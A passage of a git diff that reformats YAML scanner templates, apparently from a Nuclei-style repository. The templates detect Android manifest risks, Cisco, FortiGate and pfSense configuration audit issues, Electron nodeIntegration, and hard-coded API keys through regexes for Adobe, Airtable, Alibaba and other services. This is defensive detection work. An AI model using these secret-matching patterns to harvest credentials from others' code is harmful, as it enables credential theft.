--- a/file/android/adb-backup-enabled.yaml +++ b/file/android/adb-backup-enabled.yaml @@ -5,17 +5,16 @@ info: author: gaurang severity: low description: ADB Backup is enabled, which allows the backup and restore of an app's private data. + remediation: Ensure proper access or disable completely. reference: - https://adb-backup.com/ classification: cwe-id: CWE-200 - remediation: Ensure proper access or disable completely. tags: android,file - file: - extensions: - all matchers: - type: word words: - - "android:allowBackup=\"true\"" \ No newline at end of file + - "android:allowBackup=\"true\"" diff --git a/file/android/biometric-detect.yaml b/file/android/biometric-detect.yaml index 3240cd15e4..8ba61de9f7 100644 --- a/file/android/biometric-detect.yaml +++ b/file/android/biometric-detect.yaml @@ -7,14 +7,12 @@ info: description: Android Biometric/Fingerprint permission files were detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: diff --git a/file/android/certificate-validation.yaml b/file/android/certificate-validation.yaml index 54e69a8bbf..75a750062d 100644 --- a/file/android/certificate-validation.yaml +++ b/file/android/certificate-validation.yaml @@ -10,11 +10,9 @@ info: cvss-score: 5.3 cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: diff --git a/file/android/content-scheme.yaml b/file/android/content-scheme.yaml index d0b6474b7c..e017ecb3b7 100644 --- a/file/android/content-scheme.yaml +++ b/file/android/content-scheme.yaml @@ -7,14 +7,12 @@ info: description: Android content scheme enabling was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: android,file - file: - extensions: - xml - matchers: - type: word words: diff --git a/file/android/debug-enabled.yaml b/file/android/debug-enabled.yaml index df8363e1b9..eac3b01674 100644 --- a/file/android/debug-enabled.yaml +++ b/file/android/debug-enabled.yaml @@ -6,11 +6,9 @@ info: severity: low description: Android debug enabling was detected. tags: android,file - file: - extensions: - all - matchers: - type: regex regex: diff --git a/file/android/deep-link-detect.yaml b/file/android/deep-link-detect.yaml index 2c3c1044fa..1c246b33b6 100644 --- a/file/android/deep-link-detect.yaml +++ b/file/android/deep-link-detect.yaml @@ -11,12 +11,11 @@ info: - https://medium.com/@muratcanbur/intro-to-deep-linking-on-android-1b9fe9e38abd classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true tags: android,file,deeplink - file: - extensions: - xml diff --git a/file/android/dynamic-broadcast-receiver.yaml b/file/android/dynamic-broadcast-receiver.yaml index 579a9e1972..6d2a918982 100644 --- a/file/android/dynamic-broadcast-receiver.yaml +++ b/file/android/dynamic-broadcast-receiver.yaml @@ -7,14 +7,12 @@ info: description: Android dynamic broadcast receiver register functionality was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: diff --git a/file/android/file-scheme.yaml b/file/android/file-scheme.yaml index 4b38643bf9..399ea56a58 100644 --- a/file/android/file-scheme.yaml +++ b/file/android/file-scheme.yaml @@ -7,14 +7,12 @@ info: description: Android file scheme enabling was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: android,file - file: - extensions: - xml - matchers: - type: word words: diff --git a/file/android/google-storage-bucket.yaml b/file/android/google-storage-bucket.yaml index 95d3d860f3..7d74778d23 100644 --- a/file/android/google-storage-bucket.yaml +++ b/file/android/google-storage-bucket.yaml @@ -5,10 +5,9 @@ info: author: Thabisocn severity: info metadata: - github-query: "/[a-z0-9.-]+\\.appspot\\.com/" verified: "true" + github-query: "/[a-z0-9.-]+\\.appspot\\.com/" tags: file,android,google - file: - extensions: - all diff --git a/file/android/provider-path.yaml b/file/android/provider-path.yaml index a37f76685d..2b0ddbdc72 100644 --- a/file/android/provider-path.yaml +++ b/file/android/provider-path.yaml @@ -10,11 +10,9 @@ info: cvss-score: 5.3 cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: regex regex: diff --git a/file/android/webview-addjavascript-interface.yaml b/file/android/webview-addjavascript-interface.yaml index 168078bf95..6c1f42eef9 100644 --- a/file/android/webview-addjavascript-interface.yaml +++ b/file/android/webview-addjavascript-interface.yaml @@ -10,11 +10,9 @@ info: cvss-score: 5.3 cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: diff --git a/file/android/webview-javascript.yaml b/file/android/webview-javascript.yaml index 2dd34a934e..aca9fe44e3 100644 --- a/file/android/webview-javascript.yaml +++ b/file/android/webview-javascript.yaml @@ -7,14 +7,12 @@ info: description: WebView Javascript enabling was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: android,file,javascript - file: - extensions: - all - matchers: - type: word words: diff --git a/file/android/webview-load-url.yaml b/file/android/webview-load-url.yaml index b387b25a8d..c5fe31ebc8 100644 --- a/file/android/webview-load-url.yaml +++ b/file/android/webview-load-url.yaml @@ -7,14 +7,12 @@ info: description: WebView loadUrl usage was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: diff --git a/file/android/webview-universal-access.yaml b/file/android/webview-universal-access.yaml index 025b36e33e..665bccecce 100644 --- a/file/android/webview-universal-access.yaml +++ b/file/android/webview-universal-access.yaml @@ -10,11 +10,9 @@ info: cvss-score: 5.3 cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: diff --git a/file/audit/cisco/configure-aaa-service.yaml b/file/audit/cisco/configure-aaa-service.yaml index 5850c83e3f..2237ba4943 100644 --- a/file/audit/cisco/configure-aaa-service.yaml +++ b/file/audit/cisco/configure-aaa-service.yaml @@ -5,15 +5,14 @@ info: author: pussycat0x severity: info description: | - Cisco authentication, authorization and accounting service configuration was detected. + Cisco authentication, authorization and accounting service configuration was detected. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf diff --git a/file/audit/cisco/configure-service-timestamps-debug.yaml b/file/audit/cisco/configure-service-timestamps-debug.yaml index 07900ba018..9654e9e020 100644 --- a/file/audit/cisco/configure-service-timestamps-debug.yaml +++ b/file/audit/cisco/configure-service-timestamps-debug.yaml @@ -5,15 +5,14 @@ info: author: pussycat0x severity: info description: | - The configuration for service timestamps on Cisco devices was not implemented for debugging purposes. It's important to note that timestamps can be added to either debugging or logging messages independently. + The configuration for service timestamps on Cisco devices was not implemented for debugging purposes. It's important to note that timestamps can be added to either debugging or logging messages independently. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf diff --git a/file/audit/cisco/configure-service-timestamps-logmessages.yaml b/file/audit/cisco/configure-service-timestamps-logmessages.yaml index 754b0c28d5..ae3f0bffb5 100644 --- a/file/audit/cisco/configure-service-timestamps-logmessages.yaml +++ b/file/audit/cisco/configure-service-timestamps-logmessages.yaml @@ -5,15 +5,14 @@ info: author: pussycat0x severity: info description: | - Cisco service timestamp configuration for log messages was not implemented. + Cisco service timestamp configuration for log messages was not implemented. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf diff --git a/file/audit/cisco/disable-ip-source-route.yaml b/file/audit/cisco/disable-ip-source-route.yaml index 64aaf462d6..f4a35a7941 100644 --- a/file/audit/cisco/disable-ip-source-route.yaml +++ b/file/audit/cisco/disable-ip-source-route.yaml @@ -5,16 +5,15 @@ info: author: pussycat0x severity: info description: | - Cisco IP source-route functionality has been utilized in several attacks. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + Cisco IP source-route functionality has been utilized in several attacks. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations. remediation: Disable IP source-route where appropriate. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf diff --git a/file/audit/cisco/disable-pad-service.yaml b/file/audit/cisco/disable-pad-service.yaml index db95facb05..4fd9fc2b26 100644 --- a/file/audit/cisco/disable-pad-service.yaml +++ b/file/audit/cisco/disable-pad-service.yaml @@ -5,15 +5,14 @@ info: author: pussycat0x severity: info description: | - Cisco PAD service has proven vulnerable to attackers. To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access. + Cisco PAD service has proven vulnerable to attackers. To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access. reference: - http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf diff --git a/file/audit/cisco/enable-secret-for-password-user-and-.yaml b/file/audit/cisco/enable-secret-for-password-user-and-.yaml index f27314611e..abb6f871ab 100644 --- a/file/audit/cisco/enable-secret-for-password-user-and-.yaml +++ b/file/audit/cisco/enable-secret-for-password-user-and-.yaml @@ -5,11 +5,10 @@ info: author: pussycat0x severity: info description: | - To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. + To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf diff --git a/file/audit/cisco/logging-enable.yaml b/file/audit/cisco/logging-enable.yaml index c1641a7ff4..eb6789f719 100644 --- a/file/audit/cisco/logging-enable.yaml +++ b/file/audit/cisco/logging-enable.yaml @@ -5,15 +5,14 @@ info: author: pussycat0x severity: info description: | - Cisco logging 'logging enable' enable command enforces the monitoring of technology risks for organizations' network devices. + Cisco logging 'logging enable' enable command enforces the monitoring of technology risks for organizations' network devices. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file - file: - extensions: - conf diff --git a/file/audit/cisco/set-and-secure-passwords.yaml b/file/audit/cisco/set-and-secure-passwords.yaml index 438aa9ade7..ed8928383f 100644 --- a/file/audit/cisco/set-and-secure-passwords.yaml +++ b/file/audit/cisco/set-and-secure-passwords.yaml @@ -5,15 +5,14 @@ info: author: pussycat0x severity: info description: | - Cisco set and secure password functionality is recommended to control privilege level access. To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command. + Cisco set and secure password functionality is recommended to control privilege level access. To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-e1.html#wp3884449514 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file - file: - extensions: - conf diff --git a/file/audit/fortigate/auto-usb-install.yaml b/file/audit/fortigate/auto-usb-install.yaml index 7c2c04c328..77614e7d30 100644 --- a/file/audit/fortigate/auto-usb-install.yaml +++ b/file/audit/fortigate/auto-usb-install.yaml @@ -8,10 +8,9 @@ info: reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf diff --git a/file/audit/fortigate/heuristic-scan.yaml b/file/audit/fortigate/heuristic-scan.yaml index f7892f0503..89800970ff 100644 --- a/file/audit/fortigate/heuristic-scan.yaml +++ b/file/audit/fortigate/heuristic-scan.yaml @@ -9,10 +9,9 @@ info: reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf diff --git a/file/audit/fortigate/inactivity-timeout.yaml b/file/audit/fortigate/inactivity-timeout.yaml index 2f8cff9b04..5f5eb2e81a 100644 --- a/file/audit/fortigate/inactivity-timeout.yaml +++ b/file/audit/fortigate/inactivity-timeout.yaml @@ -8,10 +8,9 @@ info: reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf diff --git a/file/audit/fortigate/maintainer-account.yaml b/file/audit/fortigate/maintainer-account.yaml index e5e68eb21d..b441ea09fb 100644 --- a/file/audit/fortigate/maintainer-account.yaml +++ b/file/audit/fortigate/maintainer-account.yaml @@ -8,10 +8,9 @@ info: reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf diff --git a/file/audit/fortigate/password-policy.yaml b/file/audit/fortigate/password-policy.yaml index da49fa8759..e388a695af 100644 --- a/file/audit/fortigate/password-policy.yaml +++ b/file/audit/fortigate/password-policy.yaml @@ -8,10 +8,9 @@ info: reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: fortigate,config,audit,file,firewall - file: - extensions: - conf diff --git a/file/audit/fortigate/remote-auth-timeout.yaml b/file/audit/fortigate/remote-auth-timeout.yaml index 8b5acdac4d..5eb651298c 100644 --- a/file/audit/fortigate/remote-auth-timeout.yaml +++ b/file/audit/fortigate/remote-auth-timeout.yaml @@ -9,10 +9,9 @@ info: - https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf diff --git a/file/audit/fortigate/scp-admin.yaml b/file/audit/fortigate/scp-admin.yaml index 8d862f8944..22c627c21f 100644 --- a/file/audit/fortigate/scp-admin.yaml +++ b/file/audit/fortigate/scp-admin.yaml @@ -8,10 +8,9 @@ info: reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate - file: - extensions: - conf diff --git a/file/audit/fortigate/strong-ciphers.yaml b/file/audit/fortigate/strong-ciphers.yaml index 5c76f30a41..f1b0082d76 100644 --- a/file/audit/fortigate/strong-ciphers.yaml +++ b/file/audit/fortigate/strong-ciphers.yaml @@ -7,7 +7,6 @@ info: description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices tags: audit,config,file,firewall,fortigate - file: - extensions: - conf diff --git a/file/audit/pfsense/configure-dns-server.yaml b/file/audit/pfsense/configure-dns-server.yaml index ebc2d35d11..d8e4ae64d3 100644 --- a/file/audit/pfsense/configure-dns-server.yaml +++ b/file/audit/pfsense/configure-dns-server.yaml @@ -10,12 +10,11 @@ info: https://docs.netgate.com/pfsense/en/latest/recipes/dns-over-tls.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file - file: - extensions: - xml diff --git a/file/audit/pfsense/configure-session-timeout.yaml b/file/audit/pfsense/configure-session-timeout.yaml index 35a363dbb8..533146f7a0 100644 --- a/file/audit/pfsense/configure-session-timeout.yaml +++ b/file/audit/pfsense/configure-session-timeout.yaml @@ -10,12 +10,11 @@ info: https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file - file: - extensions: - xml diff --git a/file/audit/pfsense/enable-https-protocol.yaml b/file/audit/pfsense/enable-https-protocol.yaml index 48570b546a..ab4b847056 100644 --- a/file/audit/pfsense/enable-https-protocol.yaml +++ b/file/audit/pfsense/enable-https-protocol.yaml @@ -10,12 +10,11 @@ info: https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file - file: - extensions: - xml diff --git a/file/audit/pfsense/known-default-account.yaml b/file/audit/pfsense/known-default-account.yaml index 6cd6ec3485..95d997a107 100644 --- a/file/audit/pfsense/known-default-account.yaml +++ b/file/audit/pfsense/known-default-account.yaml @@ -10,10 +10,9 @@ info: - https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: audit,config,file,firewall,pfsense - file: - extensions: - xml diff --git a/file/audit/pfsense/password-protected-consolemenu.yaml b/file/audit/pfsense/password-protected-consolemenu.yaml index d6f0bbcd9b..87cd8c6fab 100644 --- a/file/audit/pfsense/password-protected-consolemenu.yaml +++ b/file/audit/pfsense/password-protected-consolemenu.yaml @@ -10,12 +10,11 @@ info: https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true tags: firewall,config,audit,pfsense,file - file: - extensions: - xml diff --git a/file/audit/pfsense/set-hostname.yaml b/file/audit/pfsense/set-hostname.yaml index 88992b1d38..d3cd5110f5 100644 --- a/file/audit/pfsense/set-hostname.yaml +++ b/file/audit/pfsense/set-hostname.yaml @@ -10,10 +10,9 @@ info: https://docs.netgate.com/pfsense/en/latest/config/general.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: firewall,config,audit,pfsense,file - file: - extensions: - xml diff --git a/file/bash/bash-scanner.yaml b/file/bash/bash-scanner.yaml index 4b2f282061..2413912448 100644 --- a/file/bash/bash-scanner.yaml +++ b/file/bash/bash-scanner.yaml @@ -9,7 +9,6 @@ info: - https://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/ - https://phoenixnap.com/kb/dangerous-linux-terminal-commands tags: bash,file,shell,sh - file: - extensions: - sh diff --git a/file/electron/electron-version-detect.yaml b/file/electron/electron-version-detect.yaml index ff8b931059..a4f58fcb15 100644 --- a/file/electron/electron-version-detect.yaml +++ b/file/electron/electron-version-detect.yaml @@ -8,10 +8,9 @@ info: - https://www.electronjs.org/blog/chromium-rce-vulnerability/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: electron,file - file: - extensions: - json diff --git a/file/electron/node-integration-enabled.yaml b/file/electron/node-integration-enabled.yaml index c9ccd8598a..4665790f43 100644 --- a/file/electron/node-integration-enabled.yaml +++ b/file/electron/node-integration-enabled.yaml @@ -10,13 +10,10 @@ info: - https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/ - https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps tags: electron,file,nodejs - file: - extensions: - all - matchers: - - type: word words: - - "nodeIntegration: true" \ No newline at end of file + - "nodeIntegration: true" diff --git a/file/js/js-analyse.yaml b/file/js/js-analyse.yaml index 37be032685..e02222e05d 100644 --- a/file/js/js-analyse.yaml +++ b/file/js/js-analyse.yaml @@ -9,7 +9,6 @@ info: metadata: verified: true tags: file,js-analyse,js,javascript - file: - extensions: - js diff --git a/file/keys/adafruit-key.yaml b/file/keys/adafruit-key.yaml index efd9a38d4d..3545438d8e 100644 --- a/file/keys/adafruit-key.yaml +++ b/file/keys/adafruit-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: adafruit,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/adobe/adobe-client.yaml b/file/keys/adobe/adobe-client.yaml index c8647bfc99..4ac7df0bd9 100644 --- a/file/keys/adobe/adobe-client.yaml +++ b/file/keys/adobe/adobe-client.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: adobe,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/adobe/adobe-secret.yaml b/file/keys/adobe/adobe-secret.yaml index 1d16b548d8..0febb3a93d 100644 --- a/file/keys/adobe/adobe-secret.yaml +++ b/file/keys/adobe/adobe-secret.yaml @@ -12,7 +12,6 @@ info: metadata: verified: true tags: adobe,oauth,file,token - file: - extensions: - all @@ -21,4 +20,4 @@ file: - type: regex part: body regex: - - '(?i)\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)' \ No newline at end of file + - '(?i)\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)' diff --git a/file/keys/age/age-identity-secret-key.yaml b/file/keys/age/age-identity-secret-key.yaml index 8efe8f0583..7c3e9ee50a 100644 --- a/file/keys/age/age-identity-secret-key.yaml +++ b/file/keys/age/age-identity-secret-key.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: age-encryption,file,token - file: - extensions: - all @@ -20,4 +19,4 @@ file: - type: regex part: body regex: - - '\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b' \ No newline at end of file + - '\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b' diff --git a/file/keys/age/age-recipient-public-key.yaml b/file/keys/age/age-recipient-public-key.yaml index c498efbc3f..552fc55d87 100644 --- a/file/keys/age/age-recipient-public-key.yaml +++ b/file/keys/age/age-recipient-public-key.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: age-encryption,file,token - file: - extensions: - all @@ -20,4 +19,4 @@ file: - type: regex part: body regex: - - '\bage1[0-9a-z]{58}\b' \ No newline at end of file + - '\bage1[0-9a-z]{58}\b' diff --git a/file/keys/airtable-key.yaml b/file/keys/airtable-key.yaml index 20c3eb5596..e7792757bc 100644 --- a/file/keys/airtable-key.yaml +++ b/file/keys/airtable-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: airtable,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/algolia-key.yaml b/file/keys/algolia-key.yaml index 7724867bb5..798c11a6d1 100644 --- a/file/keys/algolia-key.yaml +++ b/file/keys/algolia-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: algolia,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/alibaba/alibaba-key-id.yaml b/file/keys/alibaba/alibaba-key-id.yaml index faeed4e86a..cbcde8d141 100644 --- a/file/keys/alibaba/alibaba-key-id.yaml +++ b/file/keys/alibaba/alibaba-key-id.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: alibaba,access,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/alibaba/alibaba-secret-id.yaml b/file/keys/alibaba/alibaba-secret-id.yaml index 9324354baf..e867f585f0 100644 --- a/file/keys/alibaba/alibaba-secret-id.yaml +++ b/file/keys/alibaba/alibaba-secret-id.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: alibaba,secret,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - 